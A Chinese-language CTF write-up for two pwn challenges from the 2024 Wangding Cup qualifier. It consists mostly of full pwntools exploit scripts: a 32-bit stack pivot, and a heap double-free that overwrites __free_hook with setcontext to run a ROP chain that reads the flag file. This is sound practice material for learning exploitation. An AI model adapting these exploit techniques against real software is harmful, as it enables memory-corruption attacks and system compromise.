2024网鼎杯青龙组线上资格赛Pwn

青龙组不卷，只做了两道简单的，剩下的太阴间了

pwn2

32位栈迁移

md一开始没看到给了/bin/sh，自己写在栈上的打不通

from pwn import *
context(os='linux', arch='i386', log_level='debug')
context.terminal = ['tmux', 'sp', '-h']
local = 0
elf = ELF('./short')
if local:
    p = process('./short')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    p = remote('0192d5f503467e5c9706966051c75907.tiud.dg10.ciihw.cn',43656)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

sd = lambda s : p.send(s)
sl = lambda s : p.sendline(s)
sa = lambda n,s : p.sendafter(n,s)
sla = lambda n,s : p.sendlineafter(n,s)
rc = lambda n : p.recv(n)
rl = lambda : p.recvline()
ru = lambda s : p.recvuntil(s)
ra = lambda : p.recvall()
ia = lambda : p.interactive()
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

def lg(s):
    success("%s >> 0x%x" % (s, eval(s)))

def bk(addr):
    gdb.attach(p,"b *"+str(hex(addr)))

def debug(addr,PIE=False):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        gdb.attach(p,'b *{}'.format(hex(text_base+addr)))

    else:
        gdb.attach(p,"b *{}".format(hex(addr)))


gift = 0x80485E6
leave_ret = 0x08048555
ret = 0x080483fa
sla("Enter your username: ","admin")
sla("Enter your password: ","admin123")
#debug(0x8048675)
ru("You will input this: ")
add = int(rc(10),16)
lg("add")

payload = p32(0x80485FF) + p32(0x804A038)
payload = payload.ljust(0x50,b'\x00')
payload+= p32(add-4)+p32(leave_ret)
sa("plz input your msg:\n",payload)


ia()

pwn4

简单的堆orw，直接set_context

换2.35以上我早秒了QAQ

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ['tmux', 'sp', '-h']
local = 1
elf = ELF('./pwn')
if local:
    p = process('./pwn')
    libc = ELF('./libc.so.6')
else:
    p = remote('0192d6496a03783395106845917ed538.gqlw.dg06.ciihw.cn',43668)
    libc = ELF('./libc.so.6')

sd = lambda s : p.send(s)
sl = lambda s : p.sendline(s)
sa = lambda n,s : p.sendafter(n,s)
sla = lambda n,s : p.sendlineafter(n,s)
rc = lambda n : p.recv(n)
rl = lambda : p.recvline()
ru = lambda s : p.recvuntil(s)
ra = lambda : p.recvall()
ia = lambda : p.interactive()
uu32 = lambda data : u32(data.ljust(4, b'\x00'))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))

def lg(s):
    success("%s >> 0x%x" % (s, eval(s)))

def bk(addr):
    gdb.attach(p,"b *"+str(hex(addr)))

def debug(addr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(p,"b *{}".format(hex(addr)))


def rc4(data):
    key = b's4cur1ty_p4ssw0rd'
    # 初始化状态向量
    S = list(range(256))
    j = 0

    # KSA (Key Scheduling Algorithm)
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]  # 交换

    # PRGA (Pseudo-Random Generation Algorithm)
    i = j = 0
    output = bytearray()

    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]  # 交换
        K = S[(S[i] + S[j]) % 256]
        output.append(byte ^ K)  # XOR 操作

    return output

def cmd(op):
    sla("> ",str(op))

def add(index,size,content):
    cmd(1)
    sla("Input the key: ",str(index))
    sla("Input the value size: ",str(size))
    sla("Input the value: ",content)

def show(index):
    cmd(2)
    sla("Input the key: ",str(index))

def free(index):
    cmd(3)
    sla("Input the key: ",str(index))

def edit(index,content):
    cmd(4)
    sla("Input the key: ",str(index))
    sla("Input the value: ",content)


sa("Input your username:",'4dm1n\n')
sa("Input your password:",'985da4f8cb37zkj\n')

for i in range(12):
    add(i,0xf0,'a'*8)

for i in range(10):
    free(9-i)

show(0)
ru("The result is:\n\t[key,value] = [0,")
libc_base = (uu64(rc(6)[-6:]) ^ 0xa4b3e366e833) - 0x3ebca0 # 2e50a4b3e366e833
lg('libc_base')

show(4)
ru("The result is:\n\t[key,value] = [4,")
heap_base = (uu64(rc(6)[-6:]) ^ 0xa4b3e366e833) - 0x1b70 # 2e50a4b3e366e833
lg('heap_base')

flag_addr = heap_base + 0x1b70
rop_addr = flag_addr + 16 + 0x100
pop_rbp = libc_base + next(libc.search(asm('pop rbp;ret;')))
leave_ret = libc_base + next(libc.search(asm('leave;ret;')))
ret = libc_base + next(libc.search(asm('ret;')))
pop_rdi = libc_base + next(libc.search(asm('pop rdi;ret;')))
pop_rsi = libc_base + next(libc.search(asm('pop rsi;ret;')))
pop_rdx = libc_base + next(libc.search(asm('pop rdx;ret;')))
pop_rax = libc_base + next(libc.search(asm('pop rax;ret;')))
syscall_ret = libc_base + next(libc.search(asm('syscall\nret')))
stdout_addr  = libc_base + libc.sym['_IO_2_1_stdout_']
stderr_addr  = libc_base + libc.sym['_IO_2_1_stderr_']
libc_write = libc_base + libc.sym['write']
libc_read =  libc_base + libc.sym['read']
free_hook = libc_base +  libc.sym['__free_hook']
set_context = libc_base + 0x52085


add(0,0xf0,'a'*8)
add(1,0xf0,'a'*8)
add(2,0xf0,'a'*8)

payload = b'./flag.txt\x00\x00\x00\x00\x00\x00'
payload+= p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(0) + p64(pop_rax) + p64(2) + p64(syscall_ret) 
payload+= p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(flag_addr) + p64(pop_rdx) + p64(0x50) + p64(libc_read) 
payload+= p64(pop_rdi) + p64(1) + p64(libc_write)
payload = payload.ljust(0xa0, b'a')
payload += p64(rop_addr)
payload += p64(ret)

add(11,0xf0,payload)


free(2)
free(1)
free(2)

edit(2,p64(free_hook^0x2e50a4b3e366e833))

add(0,0xf0,rc4(payload))
add(0,0xf0,p64(set_context^0x2e50a4b3e366e833))

free(11)

ia()